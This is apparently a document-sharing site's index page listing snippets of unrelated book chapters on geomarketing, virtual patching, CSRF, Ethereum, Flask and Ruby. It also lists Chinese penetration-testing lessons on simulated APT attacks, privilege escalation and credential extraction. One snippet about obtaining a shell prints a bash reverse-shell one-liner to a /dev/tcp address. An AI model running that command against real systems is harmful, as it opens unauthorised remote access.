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  • 13.1 Introduction

    13.1 Introduction 13.1 Introduction This chapter demonstrates how the skills learned in Parts I and II can be applied to a particular domain: geomarketing (sometimes also refer...
  • Introduction

    Introduction Definition: Virtual Patching Why Not Just Fix the Code? Value of Virtual Patching Virtual Patching Tools A Virtual Patching Methodology Example Public Vulnerabil...
  • Implement Proper Web Server Configuration

    Implement Proper Web Server Configuration Details Remediation CWE/OWASP Implement Proper Web Server Configuration Details Certain settings on a web server can increase sec...
  • 第八课:模拟诉求任务攻击

    模拟诉求任务攻击 模拟任务: 1、主站 Shell 2、信息搜集 3、第二台服务器权限 4、msf 操作实例 模拟诉求任务攻击 模拟任务: 拿到该公司明年计划,拿到该公司今年报表,并且摸清该公司组织架构。盈利情况。 1、主站 Shell 第一个shell为目标主站shell,为08 R2,提权后遂改变主意。由于是以APT为主,并不...
  • 权限提升

    权限提升 权限提升实验 从内存中提取明文凭据 从 Windows 凭据管理器和浏览器获取密码 从 OSX 获取本地凭证和信息 权限提升 从普通用户到高权限帐户有很多不同的方式。 未被引用服务路径: 这是一个相当简单和常见的漏洞,其中服务可执行路径没有被引号括起来。这是很容易被利用的,因为如果路径周围没有引号,我们就会利用当前服务。假设我...
  • CSRF

    CSRF Usage Custom Configuration Usage Accessing CSRF Token Server-side Client-side Configuration Default Configuration CSRF Cross-site request forgery, also known as one...
  • Chapter 3: Ethereum Clients

    596 2021-02-11 《Mastering Ethereum》
    Ethereum Clients Ethereum Clients An Ethereum client is a software application that implements the Ethereum specification and communicates over the peer-to-peer network with ot...
  • Foreword for Experienced Programmers

    Foreword for Experienced Programmers Thread-Locals in Flask Develop for the Web with Caution Foreword for Experienced Programmers Thread-Locals in Flask One of the design dec...
  • 获取shell

    获取shell 常规shell反弹 几个常用: 突破防火墙的imcp_shell反弹 Shell反弹不出的时候 正向shell 获取shell 常规shell反弹 几个常用: 1 、 bash - i >& / dev / tcp / 10.0 . 0.1 / 8080 0 >& 1 2 、 python - c ...
  • Conversion

    733 2018-04-22 《RubyFu(英文)》
    Conversion Convert String/Binary to Hex Convert Hex to String/Binary Convert Hex (Return address) to Little-Endian format Convert to Unicode Escape En/Decode base-64 String En...